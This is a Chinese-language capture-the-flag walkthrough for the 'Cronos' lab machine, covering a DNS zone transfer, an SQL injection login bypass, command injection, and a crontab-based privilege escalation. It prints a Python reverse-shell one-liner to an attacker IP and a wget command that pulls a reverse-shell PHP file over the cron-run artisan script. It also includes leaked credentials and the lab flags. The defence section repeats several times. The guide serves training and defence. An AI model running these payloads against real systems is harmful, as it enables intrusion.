Cronos靶机渗透测试完整指南<\/h1>

信息收集阶段<\/h2>

初始扫描<\/h3>

使用Nmap进行端口扫描：<\/p>

nmap -p- 10.10.10.13 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp<\/strong>：OpenSSH 7.2p2 (Ubuntu)<\/li>
53\/tcp<\/strong>：ISC BIND 9.10.3-P4 (DNS服务)<\/li>
80\/tcp<\/strong>：Apache httpd 2.4.18 (Ubuntu)<\/li>
<\/ul>
DNS枚举<\/h3>

使用nslookup查询DNS信息：<\/li>
<\/ol>
nslookup 10.10.10.13
<\/span><\/span><\/code><\/pre>
执行DNS区域传输：<\/li>
<\/ol>
dig axfr @10.10.10.13 cronos.htb
<\/span><\/span><\/code><\/pre>
将发现的域名添加到\/etc\/hosts：<\/li>
<\/ol>
echo '10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>Web应用渗透<\/h2>
SQL注入攻击<\/h3>
在登录表单中发现SQL注入漏洞：<\/p>

用户名：admin' or '1'='1<\/code><\/li>
密码：任意值（如xxxx）<\/li>
<\/ul>
命令注入RCE<\/h3>
在Web应用中发现命令注入点：<\/p>

初始测试：<\/li>
<\/ol>
8.8.8.8;ls
<\/span><\/span>8.8.8.8;cat config.php
<\/span><\/span><\/code><\/pre>
从配置文件中获取数据库凭据：<\/li>
<\/ol>
username<\/span>:<\/span> admin<\/span>
<\/span><\/span>password<\/span>:<\/span> kEjdbRigfBHUREiNSDs<\/span>
<\/span><\/span><\/code><\/pre>
建立反向shell连接：<\/li>
<\/ol>
8.8.8.8;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.24",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>权限提升<\/h2>
用户权限<\/h3>
获取user flag：<\/p>
7dd961c26e9e724da5ac41a381b8f585
<\/code><\/pre>
TRP00F自动化提权<\/h3>
使用TRP00F工具进行权限提升：<\/p>
python3 trp00f.py --lhost 10.10.16.24 --lport 10011<\/span> --rhost 10.10.16.24 --rport 10033<\/span> --pkhttpport 9090<\/span> --lxhttpport 9900<\/span>
<\/span><\/span><\/code><\/pre>Crontab计划任务提权<\/h3>

检查计划任务：<\/li>
<\/ol>
cat \/etc\/crontab
<\/span><\/span><\/code><\/pre>
利用计划任务执行恶意代码：<\/li>
<\/ol>
wget -O \/var\/www\/laravel\/artisan http:\/\/10.10.16.24\/reverse.php
<\/span><\/span><\/code><\/pre>
获取root flag：<\/li>
<\/ol>
c5a019884687c3347390940b6ee1eeea
<\/code><\/pre>
关键知识点总结<\/h2>


DNS枚举技术<\/strong>：<\/p>

区域传输攻击(DNS AXFR)<\/li>
子域名枚举<\/li>
<\/ul>
<\/li>

Web应用漏洞<\/strong>：<\/p>

SQL注入绕过认证<\/li>
命令注入实现RCE<\/li>
配置文件泄露敏感信息<\/li>
<\/ul>
<\/li>

权限提升方法<\/strong>：<\/p>

自动化提权工具TRP00F的使用<\/li>
利用计划任务(Crontab)进行权限提升<\/li>
文件覆盖攻击<\/li>
<\/ul>
<\/li>

后渗透技巧<\/strong>：<\/p>

Python反向shell构造<\/li>
计划任务监控与利用<\/li>
低权限到高权限的横向移动<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

配置DNS服务器禁用区域传输<\/li>
对用户输入进行严格过滤，防止SQL注入和命令注入<\/li>
定期更新系统和应用软件<\/li>
限制计划任务的执行权限<\/li>
对敏感配置文件设置适当权限<\/li>
实施最小权限原则<\/li>
<\/ol>

Cronos靶机渗透测试完整指南<\/h1>

信息收集阶段<\/h2>

Web应用渗透<\/h2>

权限提升<\/h2>

防御建议<\/h2> 配置DNS服务器禁用区域传输<\/li> 对用户输入进行严格过滤，防止SQL注入和命令注入<\/li> 定期更新系统和应用软件<\/li> 限制计划任务的执行权限<\/li> 对敏感配置文件设置适当权限<\/li> 实施最小权限原则<\/li> <\/ol>

防御建议<\/h2>

配置DNS服务器禁用区域传输<\/li>
对用户输入进行严格过滤，防止SQL注入和命令注入<\/li>
定期更新系统和应用软件<\/li>
限制计划任务的执行权限<\/li>
对敏感配置文件设置适当权限<\/li>
实施最小权限原则<\/li> <\/ol>